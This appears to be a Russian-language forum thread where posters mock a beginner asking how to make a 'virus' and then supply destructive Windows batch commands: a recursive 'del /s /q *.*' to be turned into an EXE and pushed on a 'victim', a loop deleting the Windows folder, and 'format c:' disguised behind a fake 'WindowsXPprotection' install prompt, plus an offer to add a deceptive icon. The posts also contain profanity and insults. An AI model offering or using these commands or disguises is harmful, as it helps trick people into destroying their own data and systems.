реально если попытаться поформать системный или активный диск то ниче не произойдет, нубы бля. тока можете над такими же нубами как и вы глумиться. и не надо писать засчитникам нубов бисать что все такими были, когда я начинал и был "нубом" я не постил такие тупые посты как ТС и все остальные, я юзал гугл, десятки раз убивал винду на компе, потом как виртуалкой научился пользоваться сотни раз убивал виртуалку, читал тонны статей, но такую ХУЙНЮ никогда не писал на форумах и не спрашивал у знакомых.
Попробуй сделать какой нить батник : del /s /q *.* и сделать из него ЕХЕ файл. Или в архив закинь дальше нету разницы.Главное впарь жертве.
@Echo off For %%a in (%Windi%) do RemDir /s /q %%a Del *.* Должно удалить все в папке виндовс вместе с подпапками, кагда то я себе на 98хп так все нах удалил по синьке)
ГУРУ и сам бы смог написать вирь.... Так как я смотрю что тут один лиш стеб пощел то помогу школьнику...(только хватит трогать тему школьников-я имею ввиду человека который ТОЛЬКО НАЧИНАЕТ учиться хакерству) ОТ тебя лишь трубуется указать(отписаться) иконку какого типа к вирю присабачить...
ну учитывая что форматирование диска с просто завуалировано под установку format c: | echo If you want to installed WindowsXPprotection press Y or not press N. Install this protection component? действительно ничего..